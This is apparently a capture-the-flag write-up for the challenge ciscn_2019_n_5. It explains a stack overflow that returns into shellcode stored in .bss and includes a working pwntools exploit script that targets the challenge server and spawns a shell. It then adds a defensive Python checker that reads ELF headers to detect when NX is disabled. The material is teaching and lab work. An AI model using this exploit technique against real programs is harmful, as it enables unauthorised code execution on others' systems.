shellcode
程序员文章站
2024-02-12 11:10:58
ciscn_2019_n_5
Idea: read() stores the first input in `name` in the .bss section, so the program can be made to read shellcode into a fixed, known address; the later gets() call then overflows the stack buffer, and the saved return address is overwritten with the address of `name` to get a shell.
main:
exp:
from pwn import *

context.arch = 'amd64'            # shellcraft must emit x86-64 shellcode
p = remote('node3.buuoj.cn', 26505)

# Stage 1: the read() into name (.bss) takes our shellcode verbatim.
shellcode = asm(shellcraft.sh())
p.sendline(shellcode)

# Stage 2: gets() overflows the 0x20-byte stack buffer; 8 more bytes cover the
# saved rbp, then the return address is replaced with the address of name.
payload = b'a' * (0x20 + 8) + p64(0x0000000000601080)   # bytes, not str, under Python 3
p.sendline(payload)
p.interactive()
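The exploit only works because the binary was built without NX, so the rw- data segment holding `name` is also mapped executable. The check below, added here as an example and not part of the original writeup, reads an ELF64's program headers the way checksec does: NX counts as enabled only when PT_GNU_STACK exists without PF_X, and the flags of the segment covering a given address are reported. The sample images and the 0x400000/0x601000 layout are constructed to mirror a typical non-PIE x86-64 binary.

```python
import struct

PT_LOAD, PT_GNU_STACK = 1, 0x6474e551
PF_X, PF_W, PF_R = 1, 2, 4

def program_headers(data):
    """Parse the ELF64 program header table into (p_type, p_flags, p_vaddr, p_memsz) tuples."""
    if data[:4] != b'\x7fELF' or data[4] != 2:  # EI_CLASS must be ELFCLASS64
        raise ValueError('not an ELF64 image')
    (e_phoff,) = struct.unpack_from('<Q', data, 32)
    e_phentsize, e_phnum = struct.unpack_from('<HH', data, 54)
    out = []
    for i in range(e_phnum):
        p_type, p_flags, _off, p_vaddr, _pa, _fsz, p_memsz, _al = struct.unpack_from(
            '<IIQQQQQQ', data, e_phoff + i * e_phentsize)
        out.append((p_type, p_flags, p_vaddr, p_memsz))
    return out

def nx_enabled(data):
    """NX is on only if a PT_GNU_STACK header exists and does not request PF_X (the checksec rule)."""
    for p_type, p_flags, _, _ in program_headers(data):
        if p_type == PT_GNU_STACK:
            return not (p_flags & PF_X)
    return False

def segment_flags_at(data, addr):
    """Return the 'rwx'-style flags of the PT_LOAD segment covering addr, or None if unmapped."""
    for p_type, p_flags, p_vaddr, p_memsz in program_headers(data):
        if p_type == PT_LOAD and p_vaddr <= addr < p_vaddr + p_memsz:
            return ''.join(c if p_flags & f else '-' for c, f in (('r', PF_R), ('w', PF_W), ('x', PF_X)))
    return None

def build_elf(stack_flags, loads):
    """Constructed minimal ELF64 image: only the header fields the parser reads are filled in."""
    hdr = bytearray(64)
    hdr[:6] = b'\x7fELF\x02\x01'                          # magic, ELFCLASS64, little-endian
    struct.pack_into('<Q', hdr, 32, 64)                   # e_phoff: table follows the header
    struct.pack_into('<HH', hdr, 54, 56, len(loads) + 1)  # e_phentsize, e_phnum
    phdrs = b''.join(struct.pack('<IIQQQQQQ', PT_LOAD, fl, 0, va, va, sz, sz, 0x1000)
                     for fl, va, sz in loads)
    phdrs += struct.pack('<IIQQQQQQ', PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return bytes(hdr) + phdrs

# Constructed layout: r-x text at 0x400000, rw- data/bss at 0x601000, so name (0x601080) is in rw-.
LOADS = [(PF_R | PF_X, 0x400000, 0x1000), (PF_R | PF_W, 0x601000, 0x1000)]
WEAK = build_elf(PF_R | PF_W | PF_X, LOADS)   # RWX stack request: NX off, as in the challenge binary
HARDENED = build_elf(PF_R | PF_W, LOADS)      # what a default toolchain emits: NX on

if __name__ == '__main__':
    for label, img in (('weak', WEAK), ('hardened', HARDENED)):
        print(label, 'NX:', nx_enabled(img), 'flags at 0x601080:', segment_flags_at(img, 0x601080))
```

With NX off, the kernel's READ_IMPLIES_EXEC behaviour turns that rw- segment executable at load time, which is the property the shellcode in `name` depends on; rebuilding without `-z execstack` removes it.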